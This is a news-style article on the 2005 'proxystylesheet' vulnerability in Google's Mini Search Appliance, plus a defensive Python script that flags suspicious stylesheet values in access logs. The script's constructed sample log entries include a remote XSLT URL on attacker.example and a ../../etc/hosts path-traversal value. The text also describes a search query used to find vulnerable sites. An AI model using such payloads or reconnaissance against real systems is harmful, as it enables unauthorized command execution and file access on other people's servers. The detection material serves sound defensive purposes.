Systems Using Google Mini Search Appliance May Be At Risk
Google, the number one search engine used by Internet users, provides web developers and users certain tools for customizing searches to the user’s liking. While Google’s reputation is nearly impeccable and its products are generally thought of as “safe”, a problem first reported on June 10, 2005 causes some concern over whether such blind faith is wise.
According to The Metasploit Project, in August 2005 Google had to issue a patch to fix security flaws in its Mini Search Appliance. The patch, GA-2005-08-m, fixes problems with the Mini’s ‘proxystylesheet’ implementation. By design, the Google Mini Search Appliance allows system commands and Java code execution by users that would not ordinarily have such system privileges. (See Google Answers.) But because the search interface uses the ‘proxystylesheet’ form variable to decide which style sheet to apply to the search results, the variable becomes a channel for feeding the script dangerous code: a malicious user can supply a value that is either a local file name or an HTTP URL.
Researcher H. D. Moore says “This feature can be abused to perform cross-site scripting (XSS), file discovery, service enumeration, and arbitrary command execution” if the abuser chooses to use a remote URL. Moore provides an exploit example at Metasploit.com. The example shows how using a remote URL to an XSLT stylesheet could be used to obtain a root shell. Prior to Google’s patch, the user executing the code did not need sufficient system rights for the code to run and no checks were made prior to execution to ensure that the URL parameter was allowable.
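Because the weakness lies in what the ‘proxystylesheet’ parameter is allowed to name, an administrator can check web-server access logs for requests whose value is a remote URL or a local path rather than one of the appliance’s own stylesheet names. The following Python script is an added illustration of that check, not code from Metasploit or Google; the allowlisted stylesheet name and the log entries are constructed, and the request-line format assumed is the common Apache-style access log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist of stylesheet names a deployment expects to see;
# the real names on a given appliance are an assumption here.
ALLOWED_STYLESHEETS = {"default_frontend"}

# Matches the request line inside a common/combined-format access log entry.
REQUEST_LINE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

def classify_proxystylesheet(value):
    """Label a decoded proxystylesheet value: allowed, remote_url, local_path or unknown."""
    if value in ALLOWED_STYLESHEETS:
        return "allowed"
    scheme = urlsplit(value).scheme.lower()
    if scheme in ("http", "https", "ftp"):
        return "remote_url"          # stylesheet would be fetched from a foreign host
    segments = value.replace("\\", "/").split("/")
    if scheme == "file" or value.startswith("/") or ".." in segments:
        return "local_path"          # points into the appliance's own filesystem
    return "unknown"                 # not on the allowlist; worth a look

def scan_access_log(lines):
    """Return (line_no, value, label) for every request whose proxystylesheet is not allowlisted."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("path")).query
        # parse_qs percent-decodes, so "http%3A%2F%2F..." is seen as a URL
        for value in parse_qs(query, keep_blank_values=True).get("proxystylesheet", []):
            label = classify_proxystylesheet(value)
            if label != "allowed":
                findings.append((line_no, value, label))
    return findings

# Constructed sample log entries (not real traffic); hosts use reserved example names.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2005:12:00:01 +0000] "GET /search?q=test&proxystylesheet=default_frontend HTTP/1.1" 200 5123',
    '198.51.100.7 - - [10/Jun/2005:12:00:09 +0000] "GET /search?q=x&proxystylesheet=http%3A%2F%2Fattacker.example%2Fstyle.xsl HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Jun/2005:12:00:15 +0000] "GET /search?q=x&proxystylesheet=..%2F..%2Fetc%2Fhosts HTTP/1.1" 500 0',
    '10.0.0.8 - - [10/Jun/2005:12:01:00 +0000] "GET /search?q=hello HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for line_no, value, label in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {label:<11} {value}")
```

On the sample above the script reports line 2 as a remote URL and line 3 as a local path; an "unknown" label simply means a name outside the allowlist and should be reviewed by hand.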
While Google has stated that its Mini Search Appliance poses no security issues and has been thoroughly tested, Moore performed some random testing using a Google query on “inurl:proxystylesheet”. Of the 43 websites tested, 23 were confirmed vulnerable and unpatched.
More information on the patch for Google’s customers who have purchased its $2995 Mini Search Appliance is available at the Google Enterprise Solutions support website. The online Google support group for Google-Mini may also shed some light on security concerns with Google’s products and the appropriate fixes.